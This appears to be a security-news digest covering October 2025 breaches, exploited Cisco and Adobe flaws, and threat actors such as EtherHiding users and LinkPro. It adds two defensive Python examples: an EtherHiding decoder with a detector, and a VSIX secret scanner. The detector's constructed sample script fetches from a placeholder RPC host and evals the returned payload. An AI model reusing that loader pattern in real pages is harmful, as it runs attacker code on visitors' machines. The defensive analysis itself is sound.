Major Incidents or Breaches

  • Sotheby’s disclosed a data breach in which threat actors accessed sensitive information, including financial details of individuals.
  • Financial services company Prosper suffered a breach impacting over 17.6 million accounts, with personal information stolen.
  • F5 confirmed a long-term breach of its systems, attributed to a China-nexus threat actor. The intruders maintained persistent access to F5's BIG-IP product development environment and exfiltrated portions of BIG-IP source code along with information about undisclosed vulnerabilities; F5 shipped patches for affected products and CISA issued an emergency directive requiring federal agencies to inventory and update exposed devices.
  • Video call app Huddle01 exposed over 600,000 user logs due to a misconfigured Kafka broker.
  • Fashion retailer Mango reported a data breach at a third-party marketing provider, exposing limited contact details.
  • Users of LastPass and other top password managers are being targeted by phishing campaigns that impersonate the vendor to exploit trust in the vault; a captured master password exposes every stored credential at once.

Newly Discovered Vulnerabilities

  • Cisco IOS and IOS XE Software: CVE-2025-20352, a stack overflow in the SNMP subsystem, is being actively exploited to deploy Linux rootkits on older networking devices. Exploitation requires valid SNMP credentials: read-only community strings are enough for a denial of service, while administrative credentials allow remote code execution as root.
  • Gladinet CentreStack: A local file inclusion vulnerability (CVE-2025-11371) has been exploited as a zero-day since late September; security updates have been released.
  • Adobe Experience Manager: CVE-2025-54253, a maximum-severity (CVSS 10.0) vulnerability in AEM Forms on JEE, is being actively exploited to execute code on unpatched systems and has been added to CISA's Known Exploited Vulnerabilities catalog.
  • Fuji Electric HMI Configurator: Multiple vulnerabilities have been disclosed and patched, with advisories issued to industrial organizations.
  • Windows Kernel (Rust-based GDI component): Check Point Research reported a vulnerability in the kernel's new Rust-based GDI code to Microsoft in January 2025.
  • Microsoft Windows 11: The October 2025 cumulative update (KB5066835) broke HTTP/2 connections to localhost (127.0.0.1). This is a reliability regression rather than a security flaw, but it disrupts local IIS and Visual Studio debugging workflows that depend on loopback HTTP/2.

Notable Threat Actor Activity

  • North Korean-affiliated actors are leveraging the EtherHiding technique to distribute malware and steal cryptocurrency, using blockchain smart contracts for resilience and stealth.
  • Financially motivated threat actor UNC5142 is abusing blockchain smart contracts to distribute information stealers such as Atomic (AMOS), Lumma, and RedLine via infected WordPress sites.
  • Chinese threat actors have been linked to the F5 breach and are reportedly testing AI-optimized attack chains in Taiwan.
  • Vanilla Tempest (aka Vice Spider/Vice Society) used over 200 fraudulently obtained code-signing certificates to sign fake Microsoft Teams installers, delivered through search-engine poisoning, that dropped the Oyster backdoor ahead of Rhysida ransomware. Microsoft has revoked these certificates to disrupt ongoing attacks.
  • Attackers are exploiting the Cisco SNMP flaw (CVE-2025-20352) to install Linux rootkits on older Cisco switches; the implant hooks IOSd to set a universal login password and hide the attacker's configuration changes.
  • Separately, Synacktiv disclosed LinkPro, a Linux rootkit found on AWS-hosted infrastructure after an exposed Jenkins server was compromised. It uses eBPF programs to hide its files and processes and stays dormant until a magic TCP packet activates it, leaving little for host-based scanners to find.
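The EtherHiding technique behind the UNC5342 and UNC5142 items above hinges on a read-only eth_call to a smart contract: the contract's ABI-encoded string return carries the next-stage URL or script, so the loader needs no attacker-owned hosting. The following is an added example, not code from the original digest or from any reported sample. It shows the decode step a responder can apply to a captured JSON-RPC response, plus a static heuristic that flags page scripts pairing such a read with dynamic code execution. All inputs are constructed; the RPC host and contract address are placeholders.

```python
"""Added example, not from the original digest or from any reported sample:
the retrieval step behind EtherHiding (a read-only eth_call to a contract,
whose ABI-encoded string return carries the next stage) and a static
heuristic to flag page scripts that pair such a read with dynamic code
execution. All sample inputs are constructed; the RPC URL and contract
address are placeholders."""
import json
import re


def encode_abi_string(s: str) -> str:
    """ABI-encode a single `string` return value: offset, length, padded data."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * (-len(data) % 32)
    return ("0x" + (32).to_bytes(32, "big").hex()
            + len(data).to_bytes(32, "big").hex() + padded.hex())


def decode_abi_string(result_hex: str) -> str:
    """Inverse of encode_abi_string; this is what a loader does with the
    `result` field of an eth_call response to recover its payload."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    data = raw[offset + 32:offset + 32 + length]
    if len(data) != length:
        raise ValueError("length field exceeds payload")
    return data.decode("utf-8", errors="replace")


def payload_from_rpc_response(body: str) -> str:
    """Decode the string a contract returned, given a captured JSON-RPC body."""
    return decode_abi_string(json.loads(body)["result"])


# Heuristic: a script that reads from a contract is ordinary dapp code;
# one that feeds the read result into eval/Function/script injection is not.
RPC_READ = re.compile(r'"eth_call"|\beth_call\b|\.call\s*\(')
CONTRACT_ADDR = re.compile(r"0x[0-9a-fA-F]{40}\b")
DYNAMIC_EXEC = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*['\"]script['\"]\s*\)|\.innerHTML\s*=")


def analyze_script(js: str) -> dict:
    flags = {
        "rpc_read": bool(RPC_READ.search(js)),
        "contract_address": bool(CONTRACT_ADDR.search(js)),
        "dynamic_exec": bool(DYNAMIC_EXEC.search(js)),
    }
    flags["suspicious"] = flags["rpc_read"] and flags["dynamic_exec"]
    return flags


# Constructed samples (placeholder RPC host and address, no real infrastructure).
SUSPICIOUS_JS = r"""
(async () => {
  const rpc = "https://rpc.example.invalid";
  const target = "0xabababababababababababababababababababab";
  const r = await fetch(rpc, {method: "POST", body: JSON.stringify({
    jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: target, data: "0x00000000"}, "latest"]})});
  eval(decodeString((await r.json()).result));
})();
"""

BENIGN_JS = r"""
const bal = await provider.call({to: "0xabababababababababababababababababababab",
                                 data: "0x70a08231"});
document.getElementById("balance").textContent = bal;
"""

CAPTURED_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1,
                                "result": encode_abi_string("https://example.invalid/next.js")})

if __name__ == "__main__":
    print(payload_from_rpc_response(CAPTURED_RESPONSE))
    print(analyze_script(SUSPICIOUS_JS), analyze_script(BENIGN_JS))
```

The heuristic is deliberately narrow: legitimate dapp code reads contracts all the time, so the signal is the combination of a chain read with eval, Function or script injection, not the read on its own. Blocking the public RPC endpoints a loader uses is a stronger control where the environment has no business reaching them.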

Trends, Tools, or Tactics of Interest

  • Increased abuse of blockchain technologies (smart contracts) for malware distribution and command-and-control, notably by both state-aligned and financially motivated actors.
  • Emergence of new Linux rootkits (e.g., LinkPro) employing advanced stealth techniques such as eBPF and covert activation mechanisms.
  • Phishing campaigns specifically targeting users of password managers, exploiting trust in these platforms.
  • Software supply chain risk highlighted by the discovery of over 550 validated secrets (cloud, API and source-control credentials) embedded in extensions published to the Visual Studio Code Marketplace and Open VSX.
  • AI-driven security tools are gaining traction, with new products emerging to automate vulnerability remediation and enterprise data protection.
  • Security Operations Centers (SOCs) are under pressure to adopt AI-based platforms for scaling detection and response capabilities.
  • Ongoing concerns regarding secure coding practices in AI-generated code, with emphasis on the need for improved training and oversight.
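For the exposed-extension-secrets item above, the practical check is to unpack the .vsix package (a zip archive) and scan everything in it, bundled dependencies included, before it is allowed onto developer machines. The following is an added example, not code from the original digest, from Wiz, or from any marketplace tooling; it builds a sample package in memory with planted, non-functional values and scans it for a few high-confidence credential formats.

```python
"""Added example, not from the original digest, from Wiz, or from any
marketplace tooling: a triage scanner for secrets embedded in a VS Code
extension package (.vsix, a zip archive). The package scanned below is built
in memory with planted, non-functional sample values."""
import io
import re
import zipfile

# Prefix-bearing formats keep false positives low; the AWS secret access key
# has no distinctive shape and is left to entropy-based tools.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "generic_api_key": re.compile(r"""(?i)\bapi[_-]?key\b\s*[:=]\s*['"]([A-Za-z0-9_\-]{20,})['"]"""),
}
MAX_FILE_BYTES = 2_000_000


def redact(value: str) -> str:
    """Never echo a full credential into logs or tickets."""
    return f"{value[:4]}... ({len(value)} chars)"


def scan_vsix(vsix_bytes: bytes) -> list:
    """Return (path, pattern_name, redacted_value) for each hit in the archive.
    Everything is scanned, bundled node_modules included, since published
    extensions ship whatever the author's build directory contained."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_FILE_BYTES:
                continue
            data = zf.read(info)
            if b"\x00" in data[:1024]:  # skip binaries such as images
                continue
            text = data.decode("utf-8", errors="replace")
            for name, pat in SECRET_PATTERNS.items():
                for m in pat.finditer(text):
                    hit = m.group(1) if m.groups() else m.group(0)
                    findings.append((info.filename, name, redact(hit)))
    return findings


def build_sample_vsix() -> bytes:
    """Constructed package: the AWS key is the documented AKIAIOSFODNN7EXAMPLE
    placeholder, the other values are obviously synthetic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension.vsixmanifest", "<PackageManifest/>")
        zf.writestr("extension/package.json", '{"name": "sample-ext", "version": "0.0.1"}')
        zf.writestr("extension/out/extension.js",
                    'const client = new TelemetryClient({ apiKey: "' + "x" * 32 + '" });\n')
        zf.writestr("extension/.env",
                    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
                    "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
        zf.writestr("extension/scripts/publish.sh", "export GH_TOKEN=ghp_" + "a" * 36 + "\n")
        zf.writestr("extension/media/icon.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR")
    return buf.getvalue()


if __name__ == "__main__":
    for path, kind, value in scan_vsix(build_sample_vsix()):
        print(f"{path}: {kind} -> {value}")
```

Run the scanner over a real package by passing the bytes of a downloaded .vsix to scan_vsix. A hit means the credential is already public and must be rotated, not merely removed from the next release; the generic_api_key pattern in particular will need tuning per codebase, which is the usual trade-off between recall and noise in secret scanning.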

Regulatory or Policy Developments Affecting the Security Industry

  • Microsoft Office 2016 and Office 2019 have reached end of extended support as of October 14, 2025, with implications for continued security updates and compliance.
  • Regulatory scrutiny on data handling practices, as evidenced by allegations against Roku for collecting and selling children’s data in violation of privacy laws.
  • Financial institutions are facing increasing challenges in data governance and regulatory risk management amid evolving compliance requirements.